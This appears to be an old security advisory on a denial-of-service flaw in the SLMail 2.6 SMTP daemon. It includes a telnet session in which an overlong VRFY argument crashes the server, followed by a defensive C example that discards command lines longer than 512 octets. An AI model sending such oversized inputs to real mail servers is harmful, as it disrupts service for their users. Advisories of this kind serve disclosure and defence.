COMMAND

    Seattle Lab Sendmail 2.6

SYSTEMS AFFECTED

    WinNT

PROBLEM

    Steven has recently found a quite serious DoS attack against the
    SLMail 2.6 email daemon (www.seattlelabs.com/slmail).  A long
    string of text after a command makes the program crash.  This was
    only tested on 2.6, so it is not known whether other versions are
    vulnerable.

	craphole:~$ telnet www.victim.com 25
	Trying 555.55.555.55...
	Connected to www.victim.com.
	Escape character is '^]'.
	220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
	vrfy
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
	Connection closed by foreign host.

	craphole:~$ telnet www.victim.com 25
	Trying 555.55.555.55...
	telnet: Unable to connect to remote host: Connection refused
	craphole:~$

SOLUTION

    The situation is similar with IMail.  It is not clear whether this
    is the case with SLMail, but if SLMail behaves as IMail does, then
    this is all bogus, because that "bug" doesn't cause IMail any
    problems.  It only causes the "hacker" a problem, since IMail
    won't release the connection and won't accept any more input from
    them until they drop the connection and reconnect.  It does not
    affect any other sessions to the SMTP server.  The session drops
    cleanly, freeing all resources as designed, either when the
    "hacker" breaks the connection or when the timeout occurs,
    whichever comes first.  To repeat: it is not yet clear whether
    this is the case with SLMail.
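
    As an added example (not SLMail or IMail code, neither of which is
    shown here), this is one way an SMTP daemon can read command lines
    into a fixed buffer so that an overlong line is rejected and the
    session continues.  It enforces the 512-octet command line limit of
    RFC 5321; reader_feed, demo and the sample session are constructed
    for illustration.

```c
#include <stdio.h>
#include <string.h>

#define SMTP_MAX_LINE 512 /* RFC 5321 4.5.3.1.4: command line limit, CRLF included */
enum line_status { LINE_INCOMPLETE, LINE_OK, LINE_TOO_LONG };
struct line_reader {       /* one per connection, zero-initialised */
    char   buf[SMTP_MAX_LINE];
    size_t len;            /* bytes currently stored in buf */
    int    discarding;     /* set while skipping the rest of an oversized line */
};

/* Feed one received byte. LINE_OK: buf holds a NUL-terminated command, CRLF
 * stripped. LINE_TOO_LONG: an oversized line just ended; reply 500, keep going. */
enum line_status reader_feed(struct line_reader *r, char c)
{
    if (c == '\n') {
        enum line_status st = r->discarding ? LINE_TOO_LONG : LINE_OK;
        if (st == LINE_OK && r->len > 0 && r->buf[r->len - 1] == '\r')
            r->len--;
        r->buf[r->len] = '\0';
        r->len = 0;
        r->discarding = 0;
        return st;
    }
    if (!r->discarding && r->len < SMTP_MAX_LINE - 1)
        r->buf[r->len++] = c;   /* room left; the last slot stays free for NUL */
    else
        r->discarding = 1;      /* full: drop this byte and the rest of the line */
    return LINE_INCOMPLETE;
}

/* Constructed session: HELO, VRFY <arglen bytes>, QUIT. Returns lines accepted. */
int demo(size_t arglen)
{
    static char in[1024];
    struct line_reader r = {0};
    int accepted = 0;
    size_t n = (size_t)sprintf(in, "HELO client.example\r\nVRFY ");
    arglen = arglen > 900 ? 900 : arglen;  /* keep constructed input inside in[] */
    memset(in + n, 'd', arglen);
    n += arglen + (size_t)sprintf(in + n + arglen, "\r\nQUIT\r\n");
    for (size_t i = 0; i < n; i++)
        accepted += (reader_feed(&r, in[i]) == LINE_OK);
    return accepted;
}

int main(void)
{
    return printf("10-byte VRFY: %d/3, 600-byte VRFY: %d/3\n", demo(10), demo(600)) < 0;
}
```

    With a 600-byte argument the VRFY line is discarded without being
    stored, and the QUIT that follows is still parsed normally.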